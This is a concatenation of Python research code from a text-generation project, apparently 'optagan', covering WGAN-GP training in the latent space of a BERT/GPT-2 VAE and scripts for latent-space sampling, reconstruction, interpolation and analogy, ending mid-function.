inputs=sample,
grad_outputs=outputs,
create_graph=True,
retain_graph=True,
only_inputs=True
)[0]
#grads = grads.view(B, -1)
grad_penalty = ((grads.norm(2, dim=1) - 1.) ** 2).mean()
return grad_penalty
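# The GAN is trained entirely in Optimus' latent space: the frozen BERT encoder maps
# real sentences to latent codes, the generator maps Gaussian noise to fake codes, and
# the critic scores both under the WGAN-GP objective.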
def train(epoch):
model_encoder.eval()
model_decoder.eval()
generator.train()
critic.train()
c_train_loss = 0.
g_train_loss = 0.
g_batches = 0
c_batches = 0
c_loss_0 = 1
g_loss_0 = 1
for i, x in enumerate(train_loader):
x = x[0]
if args.cuda:
x = x.cuda()
# Generate noise
B = args.per_gpu_train_batch_size
noise = torch.from_numpy(np.random.normal(0, 1, (B,
args.latent_size))).float()
if args.cuda:
noise = noise.cuda()
# Get original text latent embeddings
with torch.no_grad():
pooled_hidden_fea = model_encoder(x, attention_mask=(x > 0).float())[1]
mean, logvar = model_encoder.linear(pooled_hidden_fea).chunk(2, -1)
z_real = mean.squeeze(1)
# Evaluate and get losses
z_fake = generator(noise)
real_score = critic(z_real)
fake_score = critic(z_fake)
grad_penalty = compute_grad_penalty(critic, z_real.data, z_fake.data)
c_loss = -torch.mean(real_score) + torch.mean(fake_score) + \
args.gp_lambda*grad_penalty
fake_score = critic(generator(noise))
g_loss = -torch.mean(fake_score)
r_g = abs(((g_loss.item() - g_loss_0) / (g_loss_0 + 0.001)))
r_c = abs(((c_loss.item() - c_loss_0) / (c_loss_0 + 0.001)))
# Update critic or generator
if ((2 + epoch) / epoch) * r_c > r_g:
c_optimizer.zero_grad()
c_batches += 1
c_train_loss += c_loss.item()
c_loss.backward()
c_optimizer.step()
else:
g_optimizer.zero_grad()
g_batches += 1
g_train_loss += g_loss.item()
g_loss.backward()
g_optimizer.step()
c_loss_0 = c_loss.item()
g_loss_0 = g_loss.item()
if args.interval > 0 and i % args.interval == 0:
logger.info('Epoch: {} | Batch: {}/{} ({:.0f}%) | G Loss: {:.6f} | C Loss: {:.6f}'.format(
epoch, args.batch_size*i, len(train_loader.dataset),
100.*(args.batch_size*i)/len(train_loader.dataset),
g_loss.item(), c_loss.item()
))
test_noise = torch.Tensor(np.random.normal(0, 1, (1, args.latent_size))).to(args.device)
test_new_z = generator(test_noise).data
# create new sent
test_z = rollout_test(model_decoder, test_new_z, tokenizer_decoder, args.max_seq_length, 1, 0, 1)
logger.info("Text: {}".format(test_z))
c_train_loss /= c_batches + 1
g_train_loss /= g_batches + 1
logger.info('* (Train) Epoch: {} | G Loss: {:.4f} | C Loss: {:.4f} | Updates G: {} | Updates C: {}'.format(
epoch, g_train_loss, c_train_loss, g_batches, c_batches
))
return (g_train_loss, c_train_loss)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--seed', type=int, default=0)
parser.add_argument('--epochs', type=int, default=15)
parser.add_argument('--lr', type=float, default=1e-4)
parser.add_argument('--gp_lambda', type=int, default=10)
parser.add_argument('--n_layers', type=int, default=20, help="Number of layers of generator and critic")
parser.add_argument('--block_dim', type=int, default=100)
parser.add_argument('--interval', type=int, default=10, help="Steps before logging output")
parser.add_argument('--cuda', type=bool, default=torch.cuda.is_available())
# Optimus parameters
parser.add_argument("--train_data_file", default=None, type=str, required=True,
help="The input training data file (a text file).")
parser.add_argument("--valid_data_file", default=None, type=str, required=True,
help="The input validation data file (a text file).")
parser.add_argument("--checkpoint_dir", default=None, type=str, required=True,
help="The directory where checkpoints are saved.")
parser.add_argument('--generator_dir', default=None, type=str, help="Directory where GAN models are saved")
parser.add_argument("--output_dir", default=None, type=str, required=True,
help="The output directory where the model predictions and checkpoints will be written.")
parser.add_argument("--dataset", default='Snli', type=str, help="The dataset.")
parser.add_argument("--latent_size", default=32, type=int, help="Latent space dimension.")
## Encoder options
parser.add_argument("--encoder_model_type", default="bert", type=str,
help="The encoder model architecture to be fine-tuned.")
parser.add_argument("--encoder_model_name_or_path", default="bert-base-cased", type=str,
help="The encoder model checkpoint for weights initialization.")
parser.add_argument("--encoder_config_name", default="", type=str,
help="Optional pretrained config name or path if not the same as model_name_or_path")
parser.add_argument("--encoder_tokenizer_name", default="", type=str,
help="Optional pretrained tokenizer name or path if not the same as model_name_or_path")
## Decoder options
parser.add_argument("--decoder_model_type", default="gpt2", type=str,
help="The decoder model architecture to be fine-tuned.")
parser.add_argument("--decoder_model_name_or_path", default="bert-base-cased", type=str,
help="The decoder model checkpoint for weights initialization.")
parser.add_argument("--decoder_config_name", default="", type=str,
help="Optional pretrained config name or path if not the same as model_name_or_path")
parser.add_argument("--decoder_tokenizer_name", default="", type=str,
help="Optional pretrained tokenizer name or path if not the same as model_name_or_path")
parser.add_argument("--per_gpu_train_batch_size", default=1, type=int,
help="Batch size per GPU/CPU for training.")
parser.add_argument("--max_seq_length", default=512, type=int,
help="Optional input sequence length before tokenization. The sequence will be dropped if it is longer the max_seq_length")
## Variational auto-encoder options
parser.add_argument("--prompt", type=str, default="")
parser.add_argument("--padding_text", type=str, default="")
parser.add_argument("--length", type=int, default=20)
parser.add_argument("--block_size", default=-1, type=int,
help="Optional input sequence length after tokenization."
"The training dataset will be truncated in block of this size for training."
"Default to the model max input length for single sentence inputs (take into account special tokens).")
parser.add_argument("--do_lower_case", action='store_true',
help="Set this flag if you are using an uncased model.")
parser.add_argument("--use_philly", action='store_true',
help="Use Philly for computing.")
parser.add_argument('--gloabl_step_eval', type=int, default=661,
help="Evaluate the results at the given global step")
# Load a trained Encoder model and vocabulary that you have fine-tuned
args = parser.parse_args()
global_step = args.gloabl_step_eval
torch.backends.cudnn.deterministic = True
args.device = torch.device("cuda" if args.cuda else "cpu")
args.n_gpu = torch.cuda.device_count()
np.random.seed(args.seed)
torch.manual_seed(args.seed)
if args.n_gpu > 0:
torch.cuda.manual_seed_all(args.seed)
args.encoder_model_type = args.encoder_model_type.lower()
args.decoder_model_type = args.decoder_model_type.lower()
output_encoder_dir = os.path.join(args.checkpoint_dir, 'checkpoint-encoder-{}'.format(global_step))
output_decoder_dir = os.path.join(args.checkpoint_dir, 'checkpoint-decoder-{}'.format(global_step))
checkpoints = [ [output_encoder_dir, output_decoder_dir] ]
# Load a trained Encoder model and vocabulary that you have fine-tuned
encoder_config_class, encoder_model_class, encoder_tokenizer_class = MODEL_CLASSES[args.encoder_model_type]
model_encoder = encoder_model_class.from_pretrained(output_encoder_dir, latent_size=args.latent_size)
tokenizer_encoder = encoder_tokenizer_class.from_pretrained(args.encoder_tokenizer_name if args.encoder_tokenizer_name else args.encoder_model_name_or_path, do_lower_case=args.do_lower_case)
model_encoder.to(args.device)
if args.block_size <= 0:
args.block_size = tokenizer_encoder.max_len_single_sentence # Our input block size will be the max possible for the model
args.block_size = min(args.block_size, tokenizer_encoder.max_len_single_sentence)
# Load a trained Decoder model and vocabulary that you have fine-tuned
decoder_config_class, decoder_model_class, decoder_tokenizer_class = MODEL_CLASSES[args.decoder_model_type]
model_decoder = decoder_model_class.from_pretrained(output_decoder_dir, latent_size=args.latent_size)
tokenizer_decoder = decoder_tokenizer_class.from_pretrained(args.decoder_tokenizer_name if args.decoder_tokenizer_name else args.decoder_model_name_or_path, do_lower_case=args.do_lower_case)
model_decoder.to(args.device)
if args.block_size <= 0:
args.block_size = tokenizer_decoder.max_len_single_sentence # Our input block size will be the max possible for the model
args.block_size = min(args.block_size, tokenizer_decoder.max_len_single_sentence)
# Chunyuan: Add Padding token to GPT2
special_tokens_dict = {'pad_token': '<PAD>', 'bos_token': '<BOS>', 'eos_token': '<EOS>'}
num_added_toks = tokenizer_decoder.add_special_tokens(special_tokens_dict)
logger.info('We have added {} tokens to GPT2'.format(num_added_toks))
model_decoder.resize_token_embeddings(len(tokenizer_decoder)) # Note: resize_token_embeddings expects the full size of the new vocabulary, i.e. the length of the tokenizer.
assert tokenizer_decoder.pad_token == '<PAD>'
train_loader = build_dataload_and_cache_examples(args, [tokenizer_encoder, tokenizer_decoder])
generator = Generator(args.n_layers, args.block_dim,args.latent_size)
critic = Critic(args.n_layers, args.block_dim,args.latent_size)
if args.generator_dir!=None:
generator.load_state_dict(torch.load(args.generator_dir+'/generator_'+str(args.gloabl_step_eval)+'.th'))
critic.load_state_dict(torch.load(args.generator_dir+'/critic_'+str(args.gloabl_step_eval)+'.th'))
g_optimizer = optim.Adam(generator.parameters(), lr=args.lr, betas=(0.5, 0.999))
c_optimizer = optim.Adam(critic.parameters(), lr=args.lr, betas=(0.5, 0.999))
if args.cuda:
generator = generator.cuda()
critic = critic.cuda()
logger.info('G Parameters:{}'.format(sum([p.numel() for p in generator.parameters() if \
p.requires_grad])))
logger.info('C Parameters:{}'.format(sum([p.numel() for p in critic.parameters() if \
p.requires_grad])))
best_bleu = 0
reference = list()
with(open(args.valid_data_file,"r")) as valid:
for sents in valid:
reference.append(sents.replace("\n", ""))
for epoch in range(1, args.epochs + 1):
g_loss, c_loss = train(epoch)
data_test = list()
for i in range(2):
test_noise = torch.Tensor(np.random.normal(0, 1, (250, args.latent_size))).to(args.device)
test_z = generator(test_noise).data
new_sent = rollout_test(model_decoder, test_z, tokenizer_decoder, args.max_seq_length, 250, 0, 1)
data_test.extend(new_sent)
p_reference = random.sample(reference, 500)
bleu = calc_blue_parallel_func(p_reference, data_test, 2, 500)
b_bleu = calc_blue_parallel_func(data_test, p_reference, 2, 500)
logger.info("Bleu-2:{:0.3f} | B-Bleu-2:{:0.3f}".format(bleu, b_bleu))
if (bleu+b_bleu) > best_bleu:
best_bleu = bleu + b_bleu
logger.info('* Saving. Best Score:{:0.3f} | Bleu-2:{:0.3f} | B-Bleu-2:{:0.3f}'.format(best_bleu, bleu, b_bleu))
torch.save(generator.state_dict(), args.output_dir+'/generator_'+str(args.gloabl_step_eval)+'.th')
torch.save(critic.state_dict(), args.output_dir+'/critic_'+str(args.gloabl_step_eval)+'.th') | [] |
2024-01-10 | Egojr/optagan | optagan~run_latent_generation.py | #!/usr/bin/env python3
# coding=utf-8
# Copyright 2018 Google AI, Google Brain and Carnegie Mellon University Authors and the HuggingFace Inc. team.
# Copyright (c) 2018, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Conditional text generation with the auto-regressive models of the library (GPT/GPT-2/Transformer-XL/XLNet)
"""
from __future__ import absolute_import, division, print_function, unicode_literals
import argparse
import glob
import logging
import os
import pickle
import random
import torch
import torch.nn.functional as F
import numpy as np
from torch.utils.data import DataLoader, Dataset, SequentialSampler, RandomSampler, TensorDataset
from torch.utils.data.distributed import DistributedSampler
from tqdm import tqdm, trange
from func import GPT2Config, OpenAIGPTConfig, XLNetConfig, TransfoXLConfig, BertConfig
from func import GPT2LMHeadModel, GPT2Tokenizer, GPT2ForLatentConnector
from func import OpenAIGPTLMHeadModel, OpenAIGPTTokenizer
from func import XLNetLMHeadModel, XLNetTokenizer
from func import TransfoXLLMHeadModel, TransfoXLTokenizer
from func import BertForLatentConnector, BertTokenizer
from collections import defaultdict
from modules import VAE
from utils import (TextDataset_Split, TextDataset_2Tokenizers, BucketingDataLoader)
import pdb
logging.basicConfig(format = '%(asctime)s - %(levelname)s - %(name)s - %(message)s',
datefmt = '%m/%d/%Y %H:%M:%S',
level = logging.INFO)
logger = logging.getLogger(__name__)
MAX_LENGTH = int(10000) # Hardcoded max length to avoid infinite loop
ALL_MODELS = sum((tuple(conf.pretrained_config_archive_map.keys()) for conf in (GPT2Config, OpenAIGPTConfig, XLNetConfig, TransfoXLConfig)), ())
MODEL_CLASSES = {
'gpt2': (GPT2Config, GPT2ForLatentConnector, GPT2Tokenizer),
'bert': (BertConfig, BertForLatentConnector, BertTokenizer)
}
# Padding text to help Transformer-XL and XLNet with short prompts as proposed by Aman Rusia
# in https://github.com/rusiaaman/XLNet-gen#methodology
# and https://medium.com/@amanrusia/xlnet-speaks-comparison-to-gpt-2-ea1a4e9ba39e
PADDING_TEXT = """ In 1991, the remains of Russian Tsar Nicholas II and his family
(except for Alexei and Maria) are discovered.
The voice of Nicholas's young son, Tsarevich Alexei Nikolaevich, narrates the
remainder of the story. 1883 Western Siberia,
a young Grigori Rasputin is asked by his father and a group of men to perform magic.
Rasputin has a vision and denounces one of the men as a horse thief. Although his
father initially slaps him for making such an accusation, Rasputin watches as the
man is chased outside and beaten. Twenty years later, Rasputin sees a vision of
the Virgin Mary, prompting him to become a priest. Rasputin quickly becomes famous,
with people, even a bishop, begging for his blessing. <eod> </s> <eos>"""
def set_seed(args):
np.random.seed(args.seed)
torch.manual_seed(args.seed)
if args.n_gpu > 0:
torch.cuda.manual_seed_all(args.seed)
def load_and_cache_examples(args, tokenizer, evaluate=False):
if isinstance(tokenizer, list):
dataset = TextDataset_2Tokenizers(tokenizer, args, file_path=args.eval_data_file if evaluate else args.train_data_file, block_size=args.block_size)
else:
dataset = TextDataset_Split(tokenizer, args, file_path=args.eval_data_file if evaluate else args.train_data_file, block_size=args.block_size)
return dataset
def build_dataload_and_cache_examples(args, tokenizer, evaluate=False):
if isinstance(tokenizer, list):
if not evaluate:
args.batch_size = args.per_gpu_train_batch_size * max(1, args.n_gpu)
file_path=args.train_data_file
else:
args.batch_size = args.per_gpu_eval_batch_size * max(1, args.n_gpu)
file_path=args.eval_data_file
dataloader = BucketingDataLoader(file_path, args.batch_size, args.max_seq_length, tokenizer, args, bucket=100, shuffle=False)
else:
pass
return dataloader
def top_k_top_p_filtering(logits, top_k=0, top_p=0.0, filter_value=-float('Inf')):
""" Filter a distribution of logits using top-k and/or nucleus (top-p) filtering
Args:
logits: logits distribution shape (vocabulary size)
top_k > 0: keep only top k tokens with highest probability (top-k filtering).
top_p > 0.0: keep the top tokens with cumulative probability >= top_p (nucleus filtering).
Nucleus filtering is described in Holtzman et al. (http://arxiv.org/abs/1904.09751)
From: https://gist.github.com/thomwolf/1a5a29f6962089e871b94cbd09daf317
"""
assert logits.dim() == 1 # batch size 1 for now - could be updated for more but the code would be less clear
top_k = min(top_k, logits.size(-1)) # Safety check
if top_k > 0:
# Remove all tokens with a probability less than the last token of the top-k
indices_to_remove = logits < torch.topk(logits, top_k)[0][..., -1, None]
logits[indices_to_remove] = filter_value
if top_p > 0.0:
sorted_logits, sorted_indices = torch.sort(logits, descending=True)
cumulative_probs = torch.cumsum(F.softmax(sorted_logits, dim=-1), dim=-1)
# Remove tokens with cumulative probability above the threshold
sorted_indices_to_remove = cumulative_probs > top_p
# Shift the indices to the right to keep also the first token above the threshold
sorted_indices_to_remove[..., 1:] = sorted_indices_to_remove[..., :-1].clone()
sorted_indices_to_remove[..., 0] = 0
indices_to_remove = sorted_indices[sorted_indices_to_remove]
logits[indices_to_remove] = filter_value
return logits
def sample_sequence(model, length, context, num_samples=1, temperature=1, top_k=0, top_p=0.0, is_xlnet=False, device='cpu'):
context = torch.tensor(context, dtype=torch.long, device=device)
context = context.unsqueeze(0).repeat(num_samples, 1)
generated = context
with torch.no_grad():
for _ in trange(length):
inputs = {'input_ids': generated}
if is_xlnet:
# XLNet is a direct (predict same token, not next token) and bi-directional model by default
# => need one additional dummy token in the input (will be masked), attention mask and target mapping (see model docstring)
input_ids = torch.cat((generated, torch.zeros((1, 1), dtype=torch.long, device=device)), dim=1)
perm_mask = torch.zeros((1, input_ids.shape[1], input_ids.shape[1]), dtype=torch.float, device=device)
perm_mask[:, :, -1] = 1.0 # Previous tokens don't see last token
target_mapping = torch.zeros((1, 1, input_ids.shape[1]), dtype=torch.float, device=device)
target_mapping[0, 0, -1] = 1.0 # predict last token
inputs = {'input_ids': input_ids, 'perm_mask': perm_mask, 'target_mapping': target_mapping}
outputs = model(**inputs) # Note: we could also use 'past' with GPT-2/Transfo-XL/XLNet (cached hidden-states)
next_token_logits = outputs[0][0, -1, :] / temperature
filtered_logits = top_k_top_p_filtering(next_token_logits, top_k=top_k, top_p=top_p)
next_token = torch.multinomial(F.softmax(filtered_logits, dim=-1), num_samples=1)
generated = torch.cat((generated, next_token.unsqueeze(0)), dim=1)
return generated
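# Conditional variant used with Optimus: the latent code is passed as `past`, so every
# decoding step is conditioned on it, and generation stops at the <EOS> token rather
# than after a fixed number of steps (the `length` argument is kept for API
# compatibility but not used).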
def sample_sequence_conditional(model, length, context, past=None, num_samples=1, temperature=1, top_k=0, top_p=0.0, device='cpu', decoder_tokenizer=None):
context = torch.tensor(context, dtype=torch.long, device=device)
context = context.unsqueeze(0).repeat(num_samples, 1)
generated = context
with torch.no_grad():
while True:
# for _ in trange(length):
inputs = {'input_ids': generated, 'past': past}
outputs = model(**inputs) # Note: we could also use 'past' with GPT-2/Transfo-XL/XLNet (cached hidden-states)
next_token_logits = outputs[0][0, -1, :] / temperature
filtered_logits = top_k_top_p_filtering(next_token_logits, top_k=top_k, top_p=top_p)
next_token = torch.multinomial(F.softmax(filtered_logits, dim=-1), num_samples=1)
generated = torch.cat((generated, next_token.unsqueeze(0)), dim=1)
# pdb.set_trace()
if next_token.unsqueeze(0)[0,0].item() == decoder_tokenizer.encode('<EOS>')[0]:
break
return generated
def latent_code_from_text(text, tokenizer_encoder, model_encoder, args):
tokenized1 = tokenizer_encoder.encode(text)
tokenized1 = [101] + tokenized1 + [102] # wrap with BERT's [CLS] (id 101) and [SEP] (id 102) tokens
coded1 = torch.Tensor([tokenized1])
coded1 = coded1.long()
with torch.no_grad():
x0 = coded1
x0 = x0.to(args.device)
pooled_hidden_fea = model_encoder(x0, attention_mask=(x0 > 0).float())[1]
mean, logvar = model_encoder.linear(pooled_hidden_fea).chunk(2, -1)
latent_z = mean.squeeze(1)
coded_length = len(tokenized1)
return latent_z, coded_length
def text_from_latent_code(latent_z, model_decoder, args, tokenizer_decoder):
past = latent_z
context_tokens = tokenizer_decoder.encode('<BOS>')
length = 128 # maximum length, but not used
out = sample_sequence_conditional(
model=model_decoder,
context=context_tokens,
past=past,
length= length, # Chunyuan: Fix length; or use <EOS> to complete a sentence
temperature=args.temperature,
top_k=args.top_k,
top_p=args.top_p,
device=args.device,
decoder_tokenizer = tokenizer_decoder
)
text_x1 = tokenizer_decoder.decode(out[0,:].tolist(), clean_up_tokenization_spaces=True)
text_x1 = text_x1.split()[1:-1]
text_x1 = ' '.join(text_x1)
return text_x1
# a wrapper function to choose between different play modes
def evaluate_latent_space(args, model_encoder, model_decoder, encoder_tokenizer, decoder_tokenizer, prefix=""):
eval_dataloader = build_dataload_and_cache_examples(args, [encoder_tokenizer, decoder_tokenizer], evaluate=False)
# Eval!
logger.info("***** Running recontruction evaluation {} *****".format(prefix))
logger.info(" Num examples = %d", len(eval_dataloader))
logger.info(" Batch size = %d", args.per_gpu_eval_batch_size)
model_encoder.eval()
model_decoder.eval()
# model_vae = model_vae.module if hasattr(model_vae, 'module') else model_vae # Take care of distributed/parallel training
if args.play_mode == 'reconstruction':
result = calc_rec(model_encoder, model_decoder, eval_dataloader, encoder_tokenizer, decoder_tokenizer, args, ns=100)
result_file_name = "eval_reconstruction_results.txt"
elif args.play_mode == 'interpolation':
result = calc_interpolate(model_encoder, model_decoder, eval_dataloader, encoder_tokenizer, decoder_tokenizer, args, ns=100)
result_file_name = "eval_interpolation_results.txt"
else:
logger.info("Please specify the corrent play mode [reconstrction, interpolation]")
eval_output_dir = args.output_dir
output_eval_file = os.path.join(eval_output_dir, result_file_name)
with open(output_eval_file, "w") as writer:
logger.info("***** Eval {} results *****".format(args.play_mode))
for key in sorted(result.keys()):
logger.info(" %s \n %s", key, str(result[key]))
writer.write("%s \n %s\n" % (key, str(result[key])))
return result
def calc_rec(model_encoder, model_decoder, eval_dataloader, encoder_tokenizer, decoder_tokenizer, args, ns=1):
count = 0
result = defaultdict(str)
for batch in tqdm(eval_dataloader, desc="Evaluating recontruction"):
# pdb.set_trace()
x0, x1, x_lengths = batch
max_len_values, _ = x_lengths.max(0)
x0 = x0[:,:max_len_values[0]]
x1 = x1[:,:max_len_values[1]]
x0 = x0.to(args.device)
x1 = x1.to(args.device)
x_lengths = x_lengths.to(args.device)
context_tokens = decoder_tokenizer.encode('<BOS>')
with torch.no_grad():
text_x0 = encoder_tokenizer.decode(x0[0,:x_lengths[0,0]].tolist(), clean_up_tokenization_spaces=True)[0]
# result["INPUT TEXT " + str(count)].append(text_x0)
pooled_hidden_fea = model_encoder(x0, attention_mask=(x0 > 0).float())[1]
# Connect hidden feature to the latent space
# latent_z, loss_kl = model_vae.connect(pooled_hidden_fea)
mean, logvar = model_encoder.linear(pooled_hidden_fea).chunk(2, -1)
latent_z = mean.squeeze(1)
past = latent_z
out = sample_sequence_conditional(
model=model_decoder,
context=context_tokens,
past=past,
length=x_lengths[0,1], # Chunyuan: Fix length; or use <EOS> to complete a sentence
temperature=args.temperature,
top_k=args.top_k,
top_p=args.top_p,
device=args.device,
decoder_tokenizer = decoder_tokenizer
)
text_x1 = decoder_tokenizer.decode(out[0,:].tolist(), clean_up_tokenization_spaces=True)
text_x1 = text_x1.split()[1:-1]
text_x1 = ' '.join(text_x1) + '\n'
result[text_x0] = text_x1
count += 1
if count>args.total_sents:
break
return result
def calc_interpolate(model_encoder, model_decoder, eval_dataloader, encoder_tokenizer, decoder_tokenizer, args, ns=1):
count = 0
latent_codes = []
sample_interval = 0
for batch in tqdm(eval_dataloader, desc="Evaluating interpolation"):
# pdb.set_trace()
x0, x1, x_lengths = batch
max_len_values, _ = x_lengths.max(0)
x0 = x0[:,:max_len_values[0]]
x0 = x0.to(args.device)
x_lengths = x_lengths.to(args.device)
with torch.no_grad():
if sample_interval == 0 or sample_interval == args.total_sents:
text_x0 = encoder_tokenizer.decode(x0[0,:x_lengths[0,0]].tolist(), clean_up_tokenization_spaces=True)[0]
pooled_hidden_fea = model_encoder(x0, attention_mask=(x0 > 0).float())[1]
# Connect hidden feature to the latent space
mean, logvar = model_encoder.linear(pooled_hidden_fea).chunk(2, -1)
latent_z = mean.squeeze(1)
latent_codes.append(latent_z)
if sample_interval == 5:
latent_codes.append(latent_z)
sample_interval = 0
continue
else:
sample_interval += 1
continue
count += 1
if count>args.total_sents:
break
context_tokens = decoder_tokenizer.encode('<BOS>')
result = defaultdict(str)
latent_codes_interpolation = []
num_steps = args.num_interpolation_steps
for step in range(num_steps+1):
latent_z = latent_codes[0] + (latent_codes[1] - latent_codes[0]) * step * 1.0/num_steps
past = latent_z
out = sample_sequence_conditional(
model=model_decoder,
context=context_tokens,
past=past,
length=x_lengths[0,1], # Chunyuan: Fix length; or use <EOS> to complete a sentence
temperature=args.temperature,
top_k=args.top_k,
top_p=args.top_p,
device=args.device,
decoder_tokenizer = decoder_tokenizer
)
text_x1 = decoder_tokenizer.decode(out[0,:].tolist(), clean_up_tokenization_spaces=True)
text_x1 = text_x1.split()[1:-1]
text_x1 = ' '.join(text_x1)
result[step] = text_x1
return result
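# Latent-space interpolation between two user-provided sentences: decode
# z(t) = z1 + (z2 - z1) * t for t running from 0 to 1 over args.num_interpolation_steps
# steps, tracing a straight line between the two sentence embeddings.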
def interpolate(model_encoder, model_decoder, tokenizer_encoder, tokenizer_decoder, args):
# Encode the source and target sentences into latent codes
latent_z1, coded_length1 = latent_code_from_text(args.sent_source, tokenizer_encoder, model_encoder, args)
latent_z2, coded_length2 = latent_code_from_text(args.sent_target, tokenizer_encoder, model_encoder, args)
result = defaultdict(str)
num_steps = args.num_interpolation_steps + 1
for step in range(num_steps+1):
latent_z = latent_z1 + (latent_z2 - latent_z1) * step * 1.0/num_steps
text_interpolate = text_from_latent_code(latent_z, model_decoder, args, tokenizer_decoder)
result[step] = text_interpolate
print(text_interpolate)
return result
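# Latent "analogy": apply the offset between the source and target codes to a third
# input sentence, z = z_input + degree_to_target * (z_target - z_source), in the
# spirit of word-vector analogies.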
def analogy(model_encoder, model_decoder, tokenizer_encoder, tokenizer_decoder, args):
latent_z1, coded_length1 = latent_code_from_text(args.sent_source, tokenizer_encoder, model_encoder, args)
latent_z2, coded_length2 = latent_code_from_text(args.sent_target, tokenizer_encoder, model_encoder, args)
latent_z3, coded_length3 = latent_code_from_text(args.sent_input, tokenizer_encoder, model_encoder, args)
result = defaultdict(str)
latent_z = latent_z3 + args.degree_to_target * (latent_z2 - latent_z1)
text_analogy = text_from_latent_code(latent_z, model_decoder, args, tokenizer_decoder)
result[0] = text_analogy
print(text_analogy)
return result
def main():
parser = argparse.ArgumentParser()
parser.add_argument("--train_data_file", default=None, type=str, required=True,
help="The input training data file (a text file).")
parser.add_argument("--eval_data_file", default=None, type=str,
help="An input evaluation data file to evaluate the perplexity on (a text file).")
parser.add_argument("--checkpoint_dir", default=None, type=str, required=True,
help="The directory where checkpoints are saved.")
parser.add_argument("--output_dir", default=None, type=str, required=True,
help="The output directory where the model predictions and checkpoints will be written.")
parser.add_argument("--dataset", default='Snli', type=str, help="The dataset.")
## Variational auto-encoder
parser.add_argument("--latent_size", default=32, type=int, help="Latent space dimension.")
parser.add_argument("--total_sents", default=10, type=int, help="Total sentences to test recontruction.")
parser.add_argument("--num_interpolation_steps", default=10, type=int, help="Total sentences to test recontruction.")
parser.add_argument("--play_mode", default="interpolation", type=str,
help="interpolation or reconstruction.")
## Encoder options
parser.add_argument("--encoder_model_type", default="bert", type=str,
help="The encoder model architecture to be fine-tuned.")
parser.add_argument("--encoder_model_name_or_path", default="bert-base-cased", type=str,
help="The encoder model checkpoint for weights initialization.")
parser.add_argument("--encoder_config_name", default="", type=str,
help="Optional pretrained config name or path if not the same as model_name_or_path")
parser.add_argument("--encoder_tokenizer_name", default="", type=str,
help="Optional pretrained tokenizer name or path if not the same as model_name_or_path")
## Decoder options
parser.add_argument("--decoder_model_type", default="gpt2", type=str,
help="The decoder model architecture to be fine-tuned.")
parser.add_argument("--decoder_model_name_or_path", default="bert-base-cased", type=str,
help="The decoder model checkpoint for weights initialization.")
parser.add_argument("--decoder_config_name", default="", type=str,
help="Optional pretrained config name or path if not the same as model_name_or_path")
parser.add_argument("--decoder_tokenizer_name", default="", type=str,
help="Optional pretrained tokenizer name or path if not the same as model_name_or_path")
parser.add_argument("--per_gpu_train_batch_size", default=1, type=int,
help="Batch size per GPU/CPU for training.")
parser.add_argument("--per_gpu_eval_batch_size", default=1, type=int,
help="Batch size per GPU/CPU for evaluation.")
parser.add_argument('--gloabl_step_eval', type=int, default=661,
help="Evaluate the results at the given global step")
parser.add_argument("--max_seq_length", default=512, type=int,
help="Optional input sequence length before tokenization. The sequence will be dropped if it is longer the max_seq_length")
# Interact with users
parser.add_argument("--interact_with_user_input", action='store_true', help="Use user input to interact_with.")
parser.add_argument("--sent_source", type=str, default="")
parser.add_argument("--sent_target", type=str, default="")
parser.add_argument("--sent_input", type=str, default="")
parser.add_argument("--degree_to_target", type=float, default="1.0")
## Variational auto-encoder
parser.add_argument("--nz", default=32, type=int,
help="Latent space dimension.")
parser.add_argument("--prompt", type=str, default="")
parser.add_argument("--padding_text", type=str, default="")
parser.add_argument("--length", type=int, default=20)
parser.add_argument("--temperature", type=float, default=1.0)
parser.add_argument("--top_k", type=int, default=0)
parser.add_argument("--top_p", type=float, default=1.0)
parser.add_argument("--no_cuda", action='store_true',
help="Avoid using CUDA when available")
parser.add_argument('--seed', type=int, default=42,
help="random seed for initialization")
parser.add_argument("--block_size", default=-1, type=int,
help="Optional input sequence length after tokenization."
"The training dataset will be truncated in block of this size for training."
"Default to the model max input length for single sentence inputs (take into account special tokens).")
parser.add_argument("--do_lower_case", action='store_true',
help="Set this flag if you are using an uncased model.")
parser.add_argument("--use_philly", action='store_true',
help="Use Philly for computing.")
args = parser.parse_args()
args.device = torch.device("cuda" if torch.cuda.is_available() and not args.no_cuda else "cpu")
args.n_gpu = torch.cuda.device_count()
set_seed(args)
args.encoder_model_type = args.encoder_model_type.lower()
args.decoder_model_type = args.decoder_model_type.lower()
global_step = args.gloabl_step_eval
output_encoder_dir = os.path.join(args.checkpoint_dir, 'checkpoint-encoder-{}'.format(global_step))
output_decoder_dir = os.path.join(args.checkpoint_dir, 'checkpoint-decoder-{}'.format(global_step))
checkpoints = [ [output_encoder_dir, output_decoder_dir] ]
logger.info("Evaluate the following checkpoints: %s", checkpoints)
# Load a trained Encoder model and vocabulary that you have fine-tuned
encoder_config_class, encoder_model_class, encoder_tokenizer_class = MODEL_CLASSES[args.encoder_model_type]
model_encoder = encoder_model_class.from_pretrained(output_encoder_dir, latent_size=args.latent_size)
tokenizer_encoder = encoder_tokenizer_class.from_pretrained(args.encoder_tokenizer_name if args.encoder_tokenizer_name else args.encoder_model_name_or_path, do_lower_case=args.do_lower_case)
model_encoder.to(args.device)
if args.block_size <= 0:
args.block_size = tokenizer_encoder.max_len_single_sentence # Our input block size will be the max possible for the model
args.block_size = min(args.block_size, tokenizer_encoder.max_len_single_sentence)
# Load a trained Decoder model and vocabulary that you have fine-tuned
decoder_config_class, decoder_model_class, decoder_tokenizer_class = MODEL_CLASSES[args.decoder_model_type]
model_decoder = decoder_model_class.from_pretrained(output_decoder_dir, latent_size=args.latent_size)
tokenizer_decoder = decoder_tokenizer_class.from_pretrained(args.decoder_tokenizer_name if args.decoder_tokenizer_name else args.decoder_model_name_or_path, do_lower_case=args.do_lower_case)
model_decoder.to(args.device)
if args.block_size <= 0:
args.block_size = tokenizer_decoder.max_len_single_sentence # Our input block size will be the max possible for the model
args.block_size = min(args.block_size, tokenizer_decoder.max_len_single_sentence)
# Load full model
# output_full_dir = os.path.join(args.checkpoint_dir, 'checkpoint-full-{}'.format(global_step)) # Paolo
